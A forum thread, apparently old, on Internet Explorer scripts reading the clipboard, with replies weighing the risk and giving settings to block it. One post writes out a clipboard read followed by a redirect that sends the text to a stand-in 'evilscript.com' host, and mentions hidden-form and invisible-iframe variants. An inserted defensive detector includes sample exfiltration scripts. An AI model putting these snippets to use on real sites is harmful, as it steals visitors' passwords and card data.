xisto Community

Security Issue With Ctrl+c/copy On Clipboard


Eek, how many malicious sites are stealing these things from your clipboard? I'd imagine that I'm either not in with the computer scene but I've never seen or heard this kind of exploit mentioned before. A very interesting find, I'm playing around with it now. Thanks. :P


Wow! Thx for posting that! It is scary enough without knowing that it is mainly one line of code:

 

var content = clipboardData.getData("Text");

 

I will be experimenting with this real soon!! :P


I knew this and other JS "handy" scripts :P This "exploit" isn't too dangerous, for many reasons:

1. They must know what is in the Clipboard, and IF it was a password (1 chance in 10^5 in my case) from which of the billions of websites on net. Additionally, they must know what was your username.

2. They can log the clipboard ONCE. Supposing it (the clipboard) is posted to a script and logged, if the "hacker" wanted to log you again would have to redirect the script back to the JS script (or print it directly). But it would log the same thing again if the Clipboard didn't change. This would eventually slow down the victim's connection or crash his/her computer. Thus, he/she would never visit your site again.

3. In order to log your Clipboard for a long time, the exploiter would have to keep you visiting his site. Not an easy thing, and in this case, there is also point "2".

A side note, Firefox doesn't support ANY clipboard command. Aside from accessing its content, you may use JS to change its content. None works with Firefox, and I don't know if this is a good or bad thing.

Conclusion: This is an "exploit" that will be hardly used, and even hardly it will succeed. I personally don't worry, also because I don't copy and paste my passwords.


So, if they want to use it, they have to pass this again to the server by making you click something or submit some form

There is no need to use this.
var content = clipboardData.getData("Text");
document.location.replace('http://www.afternic.com/domain/evilscript.com;' + content);
What would redirect you to http://www.afternic.com/domain/evilscript.com
And retrieve the value using GET. Or also create a form with hidden values, method=POST and submit it (using setTimeout and form.submit )

There are many ways to silently send the log.

Notice from cmatcmextra:
Fixed quotes. Please form quote tags in future as follows:

[quote=Person or Company Or Site Etc]QUOTED TEXT[/quote]

Forms.....

QUOTED TEXT

Edited by cmatcmextra (see edit history)
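
A defender's view of the pattern described in the post above (a clipboard read followed by a redirect or a hidden form submit), as an added example that is not part of the thread: a heuristic static check in JavaScript that flags script text where a value read via `clipboardData.getData` reaches one of those sinks. The function name, the sample scripts and the `collector.example` host are constructed for illustration.

```javascript
// Added example: heuristic review aid, not code from the thread.
const CLIPBOARD_READ = /\bclipboardData\s*\.\s*getData\s*\(/;
const NAVIGATION =
  /\blocation\s*\.\s*(?:replace|assign)\s*\(|\blocation(?:\s*\.\s*href)?\s*=[^=]/;
const FIELD_WRITE = /\.\s*value\s*=[^=]/;
const FORM_SUBMIT = /\.\s*submit\s*\(/;
const ASSIGNMENT = /^(?:(?:var|let|const)\s+)?([A-Za-z_]\w*)\s*=([^=].*)$/;

function findClipboardLeaks(source) {
  const tainted = new Set();  // variables that hold clipboard text
  let fieldFilled = false;    // a form field received clipboard text
  const findings = [];
  const carries = text =>
    CLIPBOARD_READ.test(text) ||
    [...tainted].some(name => new RegExp("\\b" + name + "\\b").test(text));

  // Naive statement split: good enough for short inline scripts.
  const statements = source.split(/[;\n]/).map(s => s.trim()).filter(Boolean);
  for (const stmt of statements) {
    const hot = carries(stmt);
    if (hot && NAVIGATION.test(stmt))
      findings.push({ sink: "navigation", statement: stmt });
    if (hot && FIELD_WRITE.test(stmt)) fieldFilled = true;
    if (fieldFilled && FORM_SUBMIT.test(stmt))
      findings.push({ sink: "form-submit", statement: stmt });
    // Propagate taint through simple assignments (x = <clipboard or tainted>).
    const assign = stmt.match(ASSIGNMENT);
    if (assign && carries(assign[2])) tainted.add(assign[1]);
  }
  return findings;
}

// Constructed sample inputs.
const REDIRECT_SAMPLE = [
  'var content = clipboardData.getData("Text")',
  'document.location.replace("https://collector.example/log?c=" + content)',
].join("\n");
const FORM_SAMPLE = [
  'var c = clipboardData.getData("Text")',
  'var f = document.forms[0]',
  'f.elements[0].value = c',
  'setTimeout(function () { f.submit() }, 10)',
].join("\n");
const DISPLAY_SAMPLE = [  // shows the text on the page only, nothing is sent
  'var t = clipboardData.getData("Text")',
  'document.getElementById("preview").innerText = t',
].join("\n");
```

A script that only displays the clipboard text produces no findings, while both sending routes named in the post are flagged.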


wow ... I didn't know that copying my text to the clipboard with ctrl+c will render my computer insecure .... thanks for the information man ... I will try not to copy my password anymore ... I will pass this message to my friends ... thanks again ...


hi mendezgarcia, thanks for your analysis and points. I myself have not worked much on Javascript. For one thing it may not just be password, but even Credit card information or n number of things. Agree that the hacker must know the website the password is for and the username, but I know a few of my friends who store all this login info i.e., website, username and password in a file on their system (since they do not remember all the passwords). Anything might happen by accident.

Favoring your point: Yeah but the chances that a site might just keep on trying to guess are less than 1 in a million. Moreover IE is not the browser that everyone uses.

I believe in being careful than regretting later... Since the solution of just switching off the option will not affect the browsing experience of the user in any way. Even if not as a security measure.. this info would be useful just for awareness.

Cheers.


Me uses Firefox, so no Ctrl+C probs.. I uses a lot. I mean a lot of Ctrl+C... Thanks to Firefox.. great security..


Sometimes, the control C javascript is very useful, for example, when you press "highlight this" or maybe using the clipboard for something like replacing "variables" etc.


Suppose, you've your letter copied on clipboard and some evil site steals it. I think it is also possible that using JavaScript a webpage may transfer selected text to the clipboard. And then using other methods of clipboard object a site may capture some personal data.

The quoted text above was sent by Sunny using PM, but I thought it would be interesting to talk about it.
Well, yes it IS possible to "transfer" selected text to JS and then send it to an "evil site" or whatever. But this would be a little more complicated thing to do. I'll post a method; there may be others, but they would follow the same structure.

The "exploiter" would have to create a site and trick you to visit it. This site would have 2 frames or iframes; one of them showing the site he wants to "steal" and the other (invisible) actually logging, using setTimeout to regularly copy and send the content.

But I think most of you know about phishing sites (what could be used as well, and it's even simpler) and wouldn't do something like this. Would you?

About capturing personal data, I don't know what you consider "personal data", but Javascript can't touch any files in your computer, except the infamous cookies. But usually the browsers disallow JS to access cookies from other sites.


My main purpose for me with this little bit of code (sorry if my last post misled any of you, hope not) in my opinion, is to display that info on my site for my visitors, with an explanation of what it is, and how to prevent it.. I am personally not too concerned about the exploit for many reasons, many of which have already been discussed, but the main reason it doesn't bother me, is because I don't use CCs on my computer and passwords are only half of the key into any site.. Anyway, my interest is in displaying this info to users, similar to how many sites display the users' IP address.. I may even add this handy little code bit to my Dynamic Signature!! :P

Again, thx for posting it! Ima have fun with it!! lol


hi friends,

 

We all copy various data by using ctrl+c/Copy for pasting elsewhere.

This copied data is stored on clipboard and is accessible over the net by a combination of Javascripts and ASP.

 

Just try this:

1) Copy any text by ctrl+c

2) Click the Link: http://www.friendlycanadian.com/rg-erdr.php?_rpo=t

3) You will see the text you copied on the Screen which was accessed by this web page.

 

Moral:

Do not keep sensitive data (like passwords, creditcard numbers, PIN etc.) in the clipboard while surfing the web. It is extremely easy to extract the text stored in the clipboard to steal your sensitive information. If sufficient data is stored by mistake it would give away confidential and important information without you knowing about it.

 

To Avoid This

To avoid this, follow these steps:

 

1. Go to internet options->security

 

2. Press custom level

 

3. In the security settings, select disable under Allow paste operations via script.

Now the contents of your clipboard are safe.

 

Pass this information on to create an awareness of the same.

 

Safe Browsing,

Cheers.



LoL Nice idea to make some sites .... :P damn dude never knew this was possible thx !!!!!!!! I am adjusting it at this moment hile !!!!!


i need to learn that code
